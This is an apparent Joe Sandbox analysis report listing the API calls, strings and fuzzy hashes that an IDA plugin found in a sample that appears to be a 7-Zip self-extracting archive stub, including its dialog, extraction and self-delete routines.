                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                    • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                    • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                    • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                    • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                    • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                    • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                    APIs
                                                    • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                    • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                    • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                    • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                    • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                    • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                    • String ID: " -$sfxwaitall
                                                    • API String ID: 2734624574-3991362806
                                                    • Opcode ID: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                    • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                    • Opcode Fuzzy Hash: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                    • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                    APIs
                                                    • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                    • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                    • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                    • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                    • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                    • API String ID: 3007203151-3467708659
                                                    • Opcode ID: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                    • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                    • Opcode Fuzzy Hash: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                    • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                    APIs
                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                    • GetParent.USER32(?), ref: 0040319B
                                                    • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                    • GetMenu.USER32(?), ref: 004031C2
                                                    • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                    • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                    • DestroyWindow.USER32(?), ref: 00403210
                                                    • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                    • GetSysColor.USER32(0000000F), ref: 00403229
                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                    • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                    • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                    • API String ID: 3514532227-2281146334
                                                    • Opcode ID: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                    • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                    • Opcode Fuzzy Hash: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                    • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                    • LoadIconW.USER32(00000000), ref: 00408717
                                                    • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                    • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                    • LoadImageW.USER32(00000000), ref: 0040873C
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                    • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                    • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                    • GetWindow.USER32(?,00000005), ref: 004088C3
                                                    • GetWindow.USER32(?,00000005), ref: 004088DF
                                                    • GetWindow.USER32(?,00000005), ref: 004088F7
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                    • LoadIconW.USER32(00000000), ref: 0040895E
                                                    • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                    • SendMessageW.USER32(00000000), ref: 00408980
                                                      • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                      • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                    • String ID:
                                                    • API String ID: 3694754696-0
                                                    • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                    • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                    • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                    • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                    APIs
                                                    • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                    • _wtol.MSVCRT ref: 00404CDF
                                                    • _wtol.MSVCRT ref: 00404CFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                    • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                    • API String ID: 2725485552-1675048025
                                                    • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                    • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                    • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                    • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                    APIs
                                                    • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                    • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                    • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                    • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                    • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                    • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                    • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                    • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                    • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                    • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                    • String ID:
                                                    • API String ID: 3462224810-0
                                                    • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                    • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                    • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                    • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                    APIs
                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                    • GetMenu.USER32(?), ref: 0040202E
                                                      • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                      • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                      • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                      • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                    • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                    • CoInitialize.OLE32(00000000), ref: 00402076
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                    • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                      • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                      • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                      • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                      • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                      • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                      • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                      • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                      • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                    • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                    • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                    • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                    • String ID: IMAGES$STATIC
                                                    • API String ID: 4202116410-1168396491
                                                    • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                    • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                    • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                    • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                    APIs
                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                    • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                    • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                    • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                    • SetFocus.USER32(00000000), ref: 00408C16
                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                    • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                    • IsWindow.USER32(00000000), ref: 00408C89
                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                    • EnableWindow.USER32(00000000), ref: 00408C9C
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                    • ShowWindow.USER32(00000000), ref: 00408CB3
                                                      • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
